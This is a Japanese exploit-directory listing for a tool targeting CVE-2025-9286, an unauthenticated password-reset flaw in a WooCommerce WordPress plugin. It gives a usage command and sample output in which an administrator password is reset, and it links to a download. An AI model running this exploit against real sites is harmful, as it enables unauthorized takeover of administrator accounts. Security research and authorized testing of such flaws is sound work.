Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/nxploited/cve-2025-9286
特権昇格パスワード攻撃エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - 認可の欠如による未認証の権限昇格

リポジトリを見る
311ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - 認可の欠如による未認証の権限昇格

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - reset_user_passwordを介した認可の欠如による未認証の権限昇格

📝 説明

WordPress用プラグイン「Appy Pie Connect for WooCommerce」は、バージョン1.1.2以前の全バージョンにおいて、reset_user_password() RESTハンドラー内の認可の欠如により、権限昇格の脆弱性が存在します。
これにより、認証されていない攻撃者が管理者を含む任意のユーザーのパスワードをリセットし、管理者アクセスを取得することが可能になります。

  • CVE: CVE-2025-9286
  • CVSS: 9.8(緊急)

💻 エクスプロイトスクリプト

以下のエクスプロイトは、脆弱性のあるプラグインバージョンを実行しているWordPressサイトに対してCVE-2025-9286を悪用するために使用できます。

スクリプト名: CVE-2025-9286.py

⚙️ 使用方法

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 出力例(エクスプロイト成功時)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 連絡先とコミュニティ

  • 📨 Telegram: @Kxploit
  • 📡 Telegramチャンネル: @KNxploited

⚠️ 免責事項

このエクスプロイトは、教育および許可を得たペネトレーションテストの目的のみで使用してください。
明示的な許可なくシステムに対して不正に使用することは違法です。
作者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。


作成者: Khaled Alenazi (Nxploited)

ツールをダウンロード